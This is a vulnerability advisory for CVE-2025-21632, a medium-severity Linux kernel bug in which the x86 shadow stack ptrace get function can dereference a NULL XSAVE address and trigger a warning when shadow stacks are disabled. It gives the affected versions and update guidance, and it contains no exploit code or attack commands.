PT-2025-4313 · Linux+4 · Linux Kernel+4
Christina Schimpe
·
Published
2025-01-07
·
Updated
2025-10-03
·
CVE-2025-21632
CVSS v3.1
5.5
Medium
| Vector | AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H |
Name of the Vulnerable Software and Affected Versions
Linux kernel versions prior to 6.6.74
Description
The issue is related to the x86 shadow stack support in the Linux kernel. The shadow stack has its own set of registers, which are XSAVE-managed but not accessible from the existing ptrace ABI for XSAVE state. A new ptrace get/set interface was introduced for this purpose. However, the regset code used by ptrace did not properly check if the shadow stack was active before accessing its registers, leading to a potential warning and instability. The
ssp get function can be called with shadow stacks disabled, triggering a warning. The estimated number of potentially affected devices is not provided.Technical details about exploitation include:
- The
ssp getfunction is vulnerable. - The
XFEATURE CET USERregister is involved. - The
get xsave addrfunction can return NULL and trigger a WARN ON. - The
ssp setfunction has anssp activecheck to avoid surprising the kernel with shadow stack behavior.
Recommendations
To resolve the issue, update to Linux kernel version 6.6.74 or later. As a temporary workaround, consider restricting access to the
ssp get function until a patch is available. Avoid using the XFEATURE CET USER register in the affected API endpoints until the issue is resolved.Exploit
Fix
Type Confusion
NULL Pointer Dereference
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Alt Linux
Linuxmint
Linux Kernel
Suse
Ubuntu